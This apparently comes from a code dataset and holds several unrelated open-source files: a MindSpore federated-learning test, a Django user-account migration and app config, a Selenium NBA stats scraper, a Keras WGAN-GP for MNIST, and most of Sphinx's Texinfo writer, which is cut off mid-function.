fl_iteration_num = args.fl_iteration_num
client_epoch_num = args.client_epoch_num
client_batch_size = args.client_batch_size
client_learning_rate = args.client_learning_rate
scheduler_manage_port = args.scheduler_manage_port
config_file_path = args.config_file_path
dp_eps = args.dp_eps
dp_delta = args.dp_delta
dp_norm_clip = args.dp_norm_clip
encrypt_type = args.encrypt_type
ctx = {
"enable_fl": True,
"server_mode": server_mode,
"ms_role": ms_role,
"worker_num": worker_num,
"server_num": server_num,
"scheduler_ip": scheduler_ip,
"scheduler_port": scheduler_port,
"fl_server_port": fl_server_port,
"start_fl_job_threshold": start_fl_job_threshold,
"start_fl_job_time_window": start_fl_job_time_window,
"update_model_ratio": update_model_ratio,
"update_model_time_window": update_model_time_window,
"share_secrets_ratio": share_secrets_ratio,
"cipher_time_window": cipher_time_window,
"reconstruct_secrets_threshold": reconstruct_secrets_threshold,
"fl_name": fl_name,
"fl_iteration_num": fl_iteration_num,
"client_epoch_num": client_epoch_num,
"client_batch_size": client_batch_size,
"client_learning_rate": client_learning_rate,
"scheduler_manage_port": scheduler_manage_port,
"config_file_path": config_file_path,
"dp_eps": dp_eps,
"dp_delta": dp_delta,
"dp_norm_clip": dp_norm_clip,
"encrypt_type": encrypt_type
}
context.set_context(mode=context.GRAPH_MODE, device_target=device_target, save_graphs=False)
context.set_fl_context(**ctx)
if __name__ == "__main__":
epoch = 5
np.random.seed(0)
network = LeNet5(62)
criterion = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction="mean")
net_opt = nn.Momentum(network.trainable_params(), 0.01, 0.9)
net_adam_opt = AdamWeightDecayOp(network.trainable_params(), weight_decay=0.1)
net_with_criterion = WithLossCell(network, criterion)
train_network = TrainOneStepCell(net_with_criterion, net_opt)
train_network.set_train()
losses = []
for _ in range(epoch):
data = Tensor(np.random.rand(32, 3, 32, 32).astype(np.float32))
label = Tensor(np.random.randint(0, 61, (32)).astype(np.int32))
loss = train_network(data, label).asnumpy()
losses.append(loss)
print(losses)
| 43.335821 | 92 | 0.769588 | ["Apache-2.0"] | LottieWang/mindspore | tests/st/fl/mobile/test_mobile_lenet.py | 5,807 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-12 00:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=254, unique=True)),
('username', models.CharField(max_length=40, unique=True)),
('first_name', models.CharField(blank=True, max_length=40)),
('last_name', models.CharField(blank=True, max_length=40)),
('tagline', models.CharField(blank=True, max_length=140)),
('is_admin', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
options={
'abstract': False,
},
),
]
| 37.333333 | 114 | 0.584821 | ["Apache-2.0"] | shtanaka/dang | authentication/migrations/0001_initial.py | 1,344 | Python |
from django.apps import AppConfig
class CodecoverageConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'codecoverage'
| 22.285714 | 56 | 0.775641 | ["Apache-2.0"] | IsmatAl/thesisProject | backend/dynamicanalysis/codecoverage/apps.py | 156 | Python |
#! /usr/bin/env python3.6
from selenium import webdriver
import time
browser = webdriver.Chrome(executable_path='/home/coslate/anaconda3/bin/chromedriver')
#url = 'https://stats.nba.com/leaders'
url = 'http://stats.nba.com/teams/traditional/#!?sort=W_PCT&dir=-1'
browser.get(url)
time.sleep(5)
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/div[1]/div[1]/div/div/label/select/option[3]').click()
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/div[1]/div[2]/div/div/label/select/option[2]').click()
#browser.find_element_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/nba-stat-table/div[3]/div/div/select/option[1]').click()
#table = browser.find_element_by_class_name('nba-stat-table__overflow')
table = browser.find_elements_by_xpath('/html/body/main/div[2]/div/div[2]/div/div/nba-stat-table/div[2]/div[1]/table/tbody')
line1 = browser.find_element_by_xpath('//tr[@index="0"]')
print(line1.text)
print("All the window handles : ")
print(browser.window_handles) # list all window handles
print("The current window handle : ")
print(browser.current_window_handle) # show the current window handle
browser.close()
| 44.653846 | 130 | 0.750215 | ["MIT"] | Coslate/NBA_Win_Predictor | crawler/test_code/test_selenium.py | 1,177 | Python |
# Large amount of credit goes to:
# https://github.com/keras-team/keras-contrib/blob/master/examples/improved_wgan.py
# which I've used as a reference for this implementation
from __future__ import print_function, division
from keras.datasets import mnist
from keras.layers.merge import _Merge
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import RMSprop
from functools import partial
import keras.backend as K
import matplotlib.pyplot as plt
import sys
import numpy as np
class RandomWeightedAverage(_Merge):
"""Provides a (random) weighted average between real and generated image samples"""
def _merge_function(self, inputs):
alpha = K.random_uniform((32, 1, 1, 1))
return (alpha * inputs[0]) + ((1 - alpha) * inputs[1])
class WGANGP():
def __init__(self):
self.img_rows = 28
self.img_cols = 28
self.channels = 1
self.img_shape = (self.img_rows, self.img_cols, self.channels)
self.latent_dim = 100
# Following parameter and optimizer set as recommended in paper
self.n_critic = 5
optimizer = RMSprop(lr=0.00005)
# Build the generator and critic
self.generator = self.build_generator()
self.critic = self.build_critic()
#-------------------------------
# Construct Computational Graph
# for the Critic
#-------------------------------
# Freeze generator's layers while training critic
self.generator.trainable = False
# Image input (real sample)
real_img = Input(shape=self.img_shape)
# Noise input
z_disc = Input(shape=(self.latent_dim,))
# Generate image based of noise (fake sample)
fake_img = self.generator(z_disc)
# Discriminator determines validity of the real and fake images
fake = self.critic(fake_img)
valid = self.critic(real_img)
# Construct weighted average between real and fake images
interpolated_img = RandomWeightedAverage()([real_img, fake_img])
# Determine validity of weighted sample
validity_interpolated = self.critic(interpolated_img)
# Use Python partial to provide loss function with additional
# 'averaged_samples' argument
partial_gp_loss = partial(self.gradient_penalty_loss,
averaged_samples=interpolated_img)
partial_gp_loss.__name__ = 'gradient_penalty' # Keras requires function names
self.critic_model = Model(inputs=[real_img, z_disc],
outputs=[valid, fake, validity_interpolated])
self.critic_model.compile(loss=[self.wasserstein_loss,
self.wasserstein_loss,
partial_gp_loss],
optimizer=optimizer,
loss_weights=[1, 1, 10])
#-------------------------------
# Construct Computational Graph
# for Generator
#-------------------------------
# For the generator we freeze the critic's layers
self.critic.trainable = False
self.generator.trainable = True
# Sampled noise for input to generator
z_gen = Input(shape=(self.latent_dim,))
# Generate images based of noise
img = self.generator(z_gen)
# Discriminator determines validity
valid = self.critic(img)
# Defines generator model
self.generator_model = Model(z_gen, valid)
self.generator_model.compile(loss=self.wasserstein_loss, optimizer=optimizer)
def gradient_penalty_loss(self, y_true, y_pred, averaged_samples):
"""
Computes gradient penalty based on prediction and weighted real / fake samples
"""
gradients = K.gradients(y_pred, averaged_samples)[0]
# compute the euclidean norm by squaring ...
gradients_sqr = K.square(gradients)
# ... summing over the rows ...
gradients_sqr_sum = K.sum(gradients_sqr,
axis=np.arange(1, len(gradients_sqr.shape)))
# ... and sqrt
gradient_l2_norm = K.sqrt(gradients_sqr_sum)
# compute lambda * (1 - ||grad||)^2 still for each single sample
gradient_penalty = K.square(1 - gradient_l2_norm)
# return the mean as loss over all the batch samples
return K.mean(gradient_penalty)
def wasserstein_loss(self, y_true, y_pred):
return K.mean(y_true * y_pred)
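# Editor's note: a sketch of the objective the two losses above implement
# (following Gulrajani et al., 2017; lambda = 10 via the loss_weights used when
# compiling critic_model, and x_hat produced by RandomWeightedAverage):
#   critic loss    = E[D(fake)] - E[D(real)] + lambda * E[(||grad D(x_hat)|| - 1)^2]
#   generator loss = -E[D(fake)]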
def build_generator(self):
model = Sequential()
model.add(Dense(128 * 7 * 7, activation="relu", input_dim=self.latent_dim))
model.add(Reshape((7, 7, 128)))
model.add(UpSampling2D())
model.add(Conv2D(128, kernel_size=4, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(Activation("relu"))
model.add(UpSampling2D())
model.add(Conv2D(64, kernel_size=4, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(Activation("relu"))
model.add(Conv2D(self.channels, kernel_size=4, padding="same"))
model.add(Activation("tanh"))
model.summary()
noise = Input(shape=(self.latent_dim,))
img = model(noise)
return Model(noise, img)
def build_critic(self):
model = Sequential()
model.add(Conv2D(16, kernel_size=3, strides=2, input_shape=self.img_shape, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(32, kernel_size=3, strides=2, padding="same"))
model.add(ZeroPadding2D(padding=((0,1),(0,1))))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(64, kernel_size=3, strides=2, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(128, kernel_size=3, strides=1, padding="same"))
model.add(BatchNormalization(momentum=0.8))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(1))
model.summary()
img = Input(shape=self.img_shape)
validity = model(img)
return Model(img, validity)
def train(self, epochs, batch_size, sample_interval=50):
# Load the dataset
(X_train, _), (_, _) = mnist.load_data()
# Rescale -1 to 1
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=3)
# Adversarial ground truths
valid = -np.ones((batch_size, 1))
fake = np.ones((batch_size, 1))
dummy = np.zeros((batch_size, 1)) # Dummy gt for gradient penalty
for epoch in range(epochs):
for _ in range(self.n_critic):
# ---------------------
# Train Discriminator
# ---------------------
# Select a random batch of images
idx = np.random.randint(0, X_train.shape[0], batch_size)
imgs = X_train[idx]
# Sample generator input
noise = np.random.normal(0, 1, (batch_size, self.latent_dim))
# Train the critic
d_loss = self.critic_model.train_on_batch([imgs, noise],
[valid, fake, dummy])
# ---------------------
# Train Generator
# ---------------------
g_loss = self.generator_model.train_on_batch(noise, valid)
# Plot the progress
print ("%d [D loss: %f] [G loss: %f]" % (epoch, d_loss[0], g_loss))
# If at save interval => save generated image samples
if epoch % sample_interval == 0:
self.sample_images(epoch)
def sample_images(self, epoch):
r, c = 5, 5
noise = np.random.normal(0, 1, (r * c, self.latent_dim))
gen_imgs = self.generator.predict(noise)
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')
axs[i,j].axis('off')
cnt += 1
fig.savefig("images/mnist_%d.png" % epoch)
plt.close()
if __name__ == '__main__':
wgan = WGANGP()
wgan.train(epochs=30000, batch_size=32, sample_interval=100)
| 36.414634 | 99 | 0.590534 | ["MIT"] | 311nguyenbaohuy/Keras-GAN | wgan_gp/wgan_gp.py | 8,958 | Python |
"""
sphinx.writers.texinfo
~~~~~~~~~~~~~~~~~~~~~~
Custom docutils writer for Texinfo.
:copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import textwrap
import warnings
from os import path
from typing import (TYPE_CHECKING, Any, Dict, Iterable, Iterator, List, Optional, Pattern, Set,
Tuple, Union, cast)
from docutils import nodes, writers
from docutils.nodes import Element, Node, Text
from sphinx import __display_version__, addnodes
from sphinx.deprecation import RemovedInSphinx50Warning
from sphinx.domains import IndexEntry
from sphinx.domains.index import IndexDomain
from sphinx.errors import ExtensionError
from sphinx.locale import _, __, admonitionlabels
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.i18n import format_date
from sphinx.writers.latex import collected_footnote
if TYPE_CHECKING:
from sphinx.builders.texinfo import TexinfoBuilder
logger = logging.getLogger(__name__)
COPYING = """\
@quotation
%(project)s %(release)s, %(date)s
%(author)s
Copyright @copyright{} %(copyright)s
@end quotation
"""
TEMPLATE = """\
\\input texinfo @c -*-texinfo-*-
@c %%**start of header
@setfilename %(filename)s
@documentencoding UTF-8
@ifinfo
@*Generated by Sphinx """ + __display_version__ + """.@*
@end ifinfo
@settitle %(title)s
@defindex ge
@paragraphindent %(paragraphindent)s
@exampleindent %(exampleindent)s
@finalout
%(direntry)s
@definfoenclose strong,`,'
@definfoenclose emph,`,'
@c %%**end of header
@copying
%(copying)s
@end copying
@titlepage
@title %(title)s
@insertcopying
@end titlepage
@contents
@c %%** start of user preamble
%(preamble)s
@c %%** end of user preamble
@ifnottex
@node Top
@top %(title)s
@insertcopying
@end ifnottex
@c %%**start of body
%(body)s
@c %%**end of body
@bye
"""
def find_subsections(section: Element) -> List[nodes.section]:
"""Return a list of subsections for the given ``section``."""
result = []
for child in section:
if isinstance(child, nodes.section):
result.append(child)
continue
elif isinstance(child, nodes.Element):
result.extend(find_subsections(child))
return result
def smart_capwords(s: str, sep: str = None) -> str:
"""Like string.capwords() but does not capitalize words that already
contain a capital letter."""
words = s.split(sep)
for i, word in enumerate(words):
if all(x.islower() for x in word):
words[i] = word.capitalize()
return (sep or ' ').join(words)
class TexinfoWriter(writers.Writer):
"""Texinfo writer for generating Texinfo documents."""
supported = ('texinfo', 'texi')
settings_spec: Tuple[str, Any, Tuple[Tuple[str, List[str], Dict[str, str]], ...]] = (
'Texinfo Specific Options', None, (
("Name of the Info file", ['--texinfo-filename'], {'default': ''}),
('Dir entry', ['--texinfo-dir-entry'], {'default': ''}),
('Description', ['--texinfo-dir-description'], {'default': ''}),
('Category', ['--texinfo-dir-category'], {'default':
'Miscellaneous'})))
settings_defaults: Dict = {}
output: str = None
visitor_attributes = ('output', 'fragment')
def __init__(self, builder: "TexinfoBuilder") -> None:
super().__init__()
self.builder = builder
def translate(self) -> None:
visitor = self.builder.create_translator(self.document, self.builder)
self.visitor = cast(TexinfoTranslator, visitor)
self.document.walkabout(visitor)
self.visitor.finish()
for attr in self.visitor_attributes:
setattr(self, attr, getattr(self.visitor, attr))
class TexinfoTranslator(SphinxTranslator):
builder: "TexinfoBuilder" = None
ignore_missing_images = False
default_elements = {
'author': '',
'body': '',
'copying': '',
'date': '',
'direntry': '',
'exampleindent': 4,
'filename': '',
'paragraphindent': 0,
'preamble': '',
'project': '',
'release': '',
'title': '',
}
def __init__(self, document: nodes.document, builder: "TexinfoBuilder") -> None:
super().__init__(document, builder)
self.init_settings()
self.written_ids: Set[str] = set() # node names and anchors in output
# node names and anchors that should be in output
self.referenced_ids: Set[str] = set()
self.indices: List[Tuple[str, str]] = [] # (node name, content)
self.short_ids: Dict[str, str] = {} # anchors --> short ids
self.node_names: Dict[str, str] = {} # node name --> node's name to display
self.node_menus: Dict[str, List[str]] = {} # node name --> node's menu entries
self.rellinks: Dict[str, List[str]] = {} # node name --> (next, previous, up)
self.collect_indices()
self.collect_node_names()
self.collect_node_menus()
self.collect_rellinks()
self.body: List[str] = []
self.context: List[str] = []
self.descs: List[addnodes.desc] = []
self.previous_section: nodes.section = None
self.section_level = 0
self.seen_title = False
self.next_section_ids: Set[str] = set()
self.escape_newlines = 0
self.escape_hyphens = 0
self.curfilestack: List[str] = []
self.footnotestack: List[Dict[str, List[Union[collected_footnote, bool]]]] = [] # NOQA
self.in_footnote = 0
self.in_samp = 0
self.handled_abbrs: Set[str] = set()
self.colwidths: List[int] = None
def finish(self) -> None:
if self.previous_section is None:
self.add_menu('Top')
for index in self.indices:
name, content = index
pointers = tuple([name] + self.rellinks[name])
self.body.append('\n@node %s,%s,%s,%s\n' % pointers)
self.body.append('@unnumbered %s\n\n%s\n' % (name, content))
while self.referenced_ids:
# handle xrefs with missing anchors
r = self.referenced_ids.pop()
if r not in self.written_ids:
self.body.append('@anchor{%s}@w{%s}\n' % (r, ' ' * 30))
self.ensure_eol()
self.fragment = ''.join(self.body)
self.elements['body'] = self.fragment
self.output = TEMPLATE % self.elements
# -- Helper routines
def init_settings(self) -> None:
elements = self.elements = self.default_elements.copy()
elements.update({
# if empty, the title is set to the first section title
'title': self.settings.title,
'author': self.settings.author,
# if empty, use basename of input file
'filename': self.settings.texinfo_filename,
'release': self.escape(self.config.release),
'project': self.escape(self.config.project),
'copyright': self.escape(self.config.copyright),
'date': self.escape(self.config.today or
format_date(self.config.today_fmt or _('%b %d, %Y'),
language=self.config.language))
})
# title
title: str = self.settings.title
if not title:
title_node = self.document.next_node(nodes.title)
title = title_node.astext() if title_node else '<untitled>'
elements['title'] = self.escape_id(title) or '<untitled>'
# filename
if not elements['filename']:
elements['filename'] = self.document.get('source') or 'untitled'
if elements['filename'][-4:] in ('.txt', '.rst'): # type: ignore
elements['filename'] = elements['filename'][:-4] # type: ignore
elements['filename'] += '.info' # type: ignore
# direntry
if self.settings.texinfo_dir_entry:
entry = self.format_menu_entry(
self.escape_menu(self.settings.texinfo_dir_entry),
'(%s)' % elements['filename'],
self.escape_arg(self.settings.texinfo_dir_description))
elements['direntry'] = ('@dircategory %s\n'
'@direntry\n'
'%s'
'@end direntry\n') % (
self.escape_id(self.settings.texinfo_dir_category), entry)
elements['copying'] = COPYING % elements
# allow the user to override them all
elements.update(self.settings.texinfo_elements)
def collect_node_names(self) -> None:
"""Generates a unique id for each section.
Assigns the attribute ``node_name`` to each section."""
def add_node_name(name: str) -> str:
node_id = self.escape_id(name)
nth, suffix = 1, ''
while node_id + suffix in self.written_ids or \
node_id + suffix in self.node_names:
nth += 1
suffix = '<%s>' % nth
node_id += suffix
self.written_ids.add(node_id)
self.node_names[node_id] = name
return node_id
# must have a "Top" node
self.document['node_name'] = 'Top'
add_node_name('Top')
add_node_name('top')
# each index is a node
self.indices = [(add_node_name(name), content)
for name, content in self.indices]
# each section is also a node
for section in self.document.findall(nodes.section):
title = cast(nodes.TextElement, section.next_node(nodes.Titular))
name = title.astext() if title else '<untitled>'
section['node_name'] = add_node_name(name)
def collect_node_menus(self) -> None:
"""Collect the menu entries for each "node" section."""
node_menus = self.node_menus
targets: List[Element] = [self.document]
targets.extend(self.document.findall(nodes.section))
for node in targets:
assert 'node_name' in node and node['node_name']
entries = [s['node_name'] for s in find_subsections(node)]
node_menus[node['node_name']] = entries
# try to find a suitable "Top" node
title = self.document.next_node(nodes.title)
top = title.parent if title else self.document
if not isinstance(top, (nodes.document, nodes.section)):
top = self.document
if top is not self.document:
entries = node_menus[top['node_name']]
entries += node_menus['Top'][1:]
node_menus['Top'] = entries
del node_menus[top['node_name']]
top['node_name'] = 'Top'
# handle the indices
for name, _content in self.indices:
node_menus[name] = []
node_menus['Top'].append(name)
def collect_rellinks(self) -> None:
"""Collect the relative links (next, previous, up) for each "node"."""
rellinks = self.rellinks
node_menus = self.node_menus
for id in node_menus:
rellinks[id] = ['', '', '']
# up's
for id, entries in node_menus.items():
for e in entries:
rellinks[e][2] = id
# next's and prev's
for id, entries in node_menus.items():
for i, id in enumerate(entries):
# First child's prev is empty
if i != 0:
rellinks[id][1] = entries[i - 1]
# Last child's next is empty
if i != len(entries) - 1:
rellinks[id][0] = entries[i + 1]
# top's next is its first child
try:
first = node_menus['Top'][0]
except IndexError:
pass
else:
rellinks['Top'][0] = first
rellinks[first][1] = 'Top'
# -- Escaping
# Which characters to escape depends on the context. In some cases,
# namely menus and node names, it's not possible to escape certain
# characters.
def escape(self, s: str) -> str:
"""Return a string with Texinfo command characters escaped."""
s = s.replace('@', '@@')
s = s.replace('{', '@{')
s = s.replace('}', '@}')
# prevent `` and '' quote conversion
s = s.replace('``', "`@w{`}")
s = s.replace("''", "'@w{'}")
return s
def escape_arg(self, s: str) -> str:
"""Return an escaped string suitable for use as an argument
to a Texinfo command."""
s = self.escape(s)
# commas are the argument delimiters
s = s.replace(',', '@comma{}')
# normalize white space
s = ' '.join(s.split()).strip()
return s
def escape_id(self, s: str) -> str:
"""Return an escaped string suitable for node names and anchors."""
bad_chars = ',:()'
for bc in bad_chars:
s = s.replace(bc, ' ')
if re.search('[^ .]', s):
# remove DOTs if name contains other characters
s = s.replace('.', ' ')
s = ' '.join(s.split()).strip()
return self.escape(s)
def escape_menu(self, s: str) -> str:
"""Return an escaped string suitable for menu entries."""
s = self.escape_arg(s)
s = s.replace(':', ';')
s = ' '.join(s.split()).strip()
return s
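    # Illustrative example: escape_menu("A: B, C") -> "A; B@comma{} C"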
def ensure_eol(self) -> None:
"""Ensure the last line in body is terminated by new line."""
if self.body and self.body[-1][-1:] != '\n':
self.body.append('\n')
def format_menu_entry(self, name: str, node_name: str, desc: str) -> str:
if name == node_name:
s = '* %s:: ' % (name,)
else:
s = '* %s: %s. ' % (name, node_name)
offset = max((24, (len(name) + 4) % 78))
wdesc = '\n'.join(' ' * offset + l for l in
textwrap.wrap(desc, width=78 - offset))
return s + wdesc.strip() + '\n'
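    # Illustrative example: format_menu_entry('Intro', 'intro', 'Short overview')
    # returns '* Intro: intro. Short overview\n'; longer descriptions are wrapped
    # and continuation lines are indented to the computed offset.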
def add_menu_entries(self, entries: List[str], reg: Pattern = re.compile(r'\s+---?\s+')
) -> None:
for entry in entries:
name = self.node_names[entry]
# special formatting for entries that are divided by an em-dash
try:
parts = reg.split(name, 1)
except TypeError:
# could be a gettext proxy
parts = [name]
if len(parts) == 2:
name, desc = parts
else:
desc = ''
name = self.escape_menu(name)
desc = self.escape(desc)
self.body.append(self.format_menu_entry(name, entry, desc))
def add_menu(self, node_name: str) -> None:
entries = self.node_menus[node_name]
if not entries:
return
self.body.append('\n@menu\n')
self.add_menu_entries(entries)
if (node_name != 'Top' or
not self.node_menus[entries[0]] or
self.config.texinfo_no_detailmenu):
self.body.append('\n@end menu\n')
return
def _add_detailed_menu(name: str) -> None:
entries = self.node_menus[name]
if not entries:
return
self.body.append('\n%s\n\n' % (self.escape(self.node_names[name],)))
self.add_menu_entries(entries)
for subentry in entries:
_add_detailed_menu(subentry)
self.body.append('\n@detailmenu\n'
' --- The Detailed Node Listing ---\n')
for entry in entries:
_add_detailed_menu(entry)
self.body.append('\n@end detailmenu\n'
'@end menu\n')
def tex_image_length(self, width_str: str) -> str:
match = re.match(r'(\d*\.?\d*)\s*(\S*)', width_str)
if not match:
# fallback
return width_str
res = width_str
amount, unit = match.groups()[:2]
if not unit or unit == "px":
# pixels: let TeX alone
return ''
elif unit == "%":
# a4paper: textwidth=418.25368pt
res = "%d.0pt" % (float(amount) * 4.1825368)
return res
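    # Illustrative examples: '100px' -> '' (pixels are left to TeX),
    # '50%' -> '209.0pt' (fraction of the a4paper text width), '3cm' -> '3cm'.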
def collect_indices(self) -> None:
def generate(content: List[Tuple[str, List[IndexEntry]]], collapsed: bool) -> str:
ret = ['\n@menu\n']
for _letter, entries in content:
for entry in entries:
if not entry[3]:
continue
name = self.escape_menu(entry[0])
sid = self.get_short_id('%s:%s' % (entry[2], entry[3]))
desc = self.escape_arg(entry[6])
me = self.format_menu_entry(name, sid, desc)
ret.append(me)
ret.append('@end menu\n')
return ''.join(ret)
indices_config = self.config.texinfo_domain_indices
if indices_config:
for domain in self.builder.env.domains.values():
for indexcls in domain.indices:
indexname = '%s-%s' % (domain.name, indexcls.name)
if isinstance(indices_config, list):
if indexname not in indices_config:
continue
content, collapsed = indexcls(domain).generate(
self.builder.docnames)
if not content:
continue
self.indices.append((indexcls.localname,
generate(content, collapsed)))
# only add the main Index if it's not empty
domain = cast(IndexDomain, self.builder.env.get_domain('index'))
for docname in self.builder.docnames:
if domain.entries[docname]:
self.indices.append((_('Index'), '\n@printindex ge\n'))
break
# this is copied from the latex writer
# TODO: move this to sphinx.util
def collect_footnotes(self, node: Element) -> Dict[str, List[Union[collected_footnote, bool]]]: # NOQA
def footnotes_under(n: Element) -> Iterator[nodes.footnote]:
if isinstance(n, nodes.footnote):
yield n
else:
for c in n.children:
if isinstance(c, addnodes.start_of_file):
continue
elif isinstance(c, nodes.Element):
yield from footnotes_under(c)
fnotes: Dict[str, List[Union[collected_footnote, bool]]] = {}
for fn in footnotes_under(node):
label = cast(nodes.label, fn[0])
num = label.astext().strip()
fnotes[num] = [collected_footnote('', *fn.children), False]
return fnotes
# -- xref handling
def get_short_id(self, id: str) -> str:
"""Return a shorter 'id' associated with ``id``."""
# Shorter ids improve paragraph filling in places
# that the id is hidden by Emacs.
try:
sid = self.short_ids[id]
except KeyError:
sid = hex(len(self.short_ids))[2:]
self.short_ids[id] = sid
return sid
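    # Illustrative note: short ids are sequential hex strings, so the first
    # three distinct ids map to '0', '1' and '2'.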
def add_anchor(self, id: str, node: Node) -> None:
if id.startswith('index-'):
return
id = self.curfilestack[-1] + ':' + id
eid = self.escape_id(id)
sid = self.get_short_id(id)
for id in (eid, sid):
if id not in self.written_ids:
self.body.append('@anchor{%s}' % id)
self.written_ids.add(id)
def add_xref(self, id: str, name: str, node: Node) -> None:
name = self.escape_menu(name)
sid = self.get_short_id(id)
if self.config.texinfo_cross_references:
self.body.append('@ref{%s,,%s}' % (sid, name))
self.referenced_ids.add(sid)
self.referenced_ids.add(self.escape_id(id))
else:
self.body.append(name)
# -- Visiting
def visit_document(self, node: Element) -> None:
self.footnotestack.append(self.collect_footnotes(node))
self.curfilestack.append(node.get('docname', ''))
if 'docname' in node:
self.add_anchor(':doc', node)
def depart_document(self, node: Element) -> None:
self.footnotestack.pop()
self.curfilestack.pop()
def visit_Text(self, node: Text) -> None:
s = self.escape(node.astext())
if self.escape_newlines:
s = s.replace('\n', ' ')
if self.escape_hyphens:
# prevent "--" and "---" conversion
s = s.replace('-', '@w{-}')
self.body.append(s)
def depart_Text(self, node: Text) -> None:
pass
def visit_section(self, node: Element) -> None:
self.next_section_ids.update(node.get('ids', []))
if not self.seen_title:
return
if self.previous_section:
self.add_menu(self.previous_section['node_name'])
else:
self.add_menu('Top')
node_name = node['node_name']
pointers = tuple([node_name] + self.rellinks[node_name])
self.body.append('\n@node %s,%s,%s,%s\n' % pointers)
for id in sorted(self.next_section_ids):
self.add_anchor(id, node)
self.next_section_ids.clear()
self.previous_section = cast(nodes.section, node)
self.section_level += 1
def depart_section(self, node: Element) -> None:
self.section_level -= 1
headings = (
'@unnumbered',
'@chapter',
'@section',
'@subsection',
'@subsubsection',
)
rubrics = (
'@heading',
'@subheading',
'@subsubheading',
)
def visit_title(self, node: Element) -> None:
if not self.seen_title:
self.seen_title = True
raise nodes.SkipNode
parent = node.parent
if isinstance(parent, nodes.table):
return
if isinstance(parent, (nodes.Admonition, nodes.sidebar, nodes.topic)):
raise nodes.SkipNode
elif not isinstance(parent, nodes.section):
logger.warning(__('encountered title node not in section, topic, table, '
'admonition or sidebar'),
location=node)
self.visit_rubric(node)
else:
try:
heading = self.headings[self.section_level]
except IndexError:
heading = self.headings[-1]
self.body.append('\n%s ' % heading)
def depart_title(self, node: Element) -> None:
self.body.append('\n\n')
def visit_rubric(self, node: Element) -> None:
if len(node) == 1 and node.astext() in ('Footnotes', _('Footnotes')):
raise nodes.SkipNode
try:
rubric = self.rubrics[self.section_level]
except IndexError:
rubric = self.rubrics[-1]
self.body.append('\n%s ' % rubric)
self.escape_newlines += 1
def depart_rubric(self, node: Element) -> None:
self.escape_newlines -= 1
self.body.append('\n\n')
def visit_subtitle(self, node: Element) -> None:
self.body.append('\n\n@noindent\n')
def depart_subtitle(self, node: Element) -> None:
self.body.append('\n\n')
# -- References
def visit_target(self, node: Element) -> None:
# postpone the labels until after the sectioning command
parindex = node.parent.index(node)
try:
try:
next = node.parent[parindex + 1]
except IndexError:
# last node in parent, look at next after parent
# (for section of equal level)
next = node.parent.parent[node.parent.parent.index(node.parent)]
if isinstance(next, nodes.section):
if node.get('refid'):
self.next_section_ids.add(node['refid'])
self.next_section_ids.update(node['ids'])
return
except (IndexError, AttributeError):
pass
if 'refuri' in node:
return
if node.get('refid'):
self.add_anchor(node['refid'], node)
for id in node['ids']:
self.add_anchor(id, node)
def depart_target(self, node: Element) -> None:
pass
def visit_reference(self, node: Element) -> None:
# an xref's target is displayed in Info so we ignore a few
# cases for the sake of appearance
if isinstance(node.parent, (nodes.title, addnodes.desc_type)):
return
if isinstance(node[0], nodes.image):
return
name = node.get('name', node.astext()).strip()
uri = node.get('refuri', '')
if not uri and node.get('refid'):
uri = '%' + self.curfilestack[-1] + '#' + node['refid']
if not uri:
return
if uri.startswith('mailto:'):
uri = self.escape_arg(uri[7:])
name = self.escape_arg(name)
if not name or name == uri:
self.body.append('@email{%s}' % uri)
else:
self.body.append('@email{%s,%s}' % (uri, name))
elif uri.startswith('#'):
# references to labels in the same document
id = self.curfilestack[-1] + ':' + uri[1:]
self.add_xref(id, name, node)
elif uri.startswith('%'):
# references to documents or labels inside documents
hashindex = uri.find('#')
if hashindex == -1:
# reference to the document
id = uri[1:] + '::doc'
else:
# reference to a label
id = uri[1:].replace('#', ':')
self.add_xref(id, name, node)
elif uri.startswith('info:'):
# references to an external Info file
uri = uri[5:].replace('_', ' ')
uri = self.escape_arg(uri)
id = 'Top'
if '#' in uri:
uri, id = uri.split('#', 1)
id = self.escape_id(id)
name = self.escape_menu(name)
if name == id:
self.body.append('@ref{%s,,,%s}' % (id, uri))
else:
self.body.append('@ref{%s,,%s,%s}' % (id, name, uri))
else:
uri = self.escape_arg(uri)
name = self.escape_arg(name)
show_urls = self.config.texinfo_show_urls
if self.in_footnote:
show_urls = 'inline'
if not name or uri == name:
self.body.append('@indicateurl{%s}' % uri)
elif show_urls == 'inline':
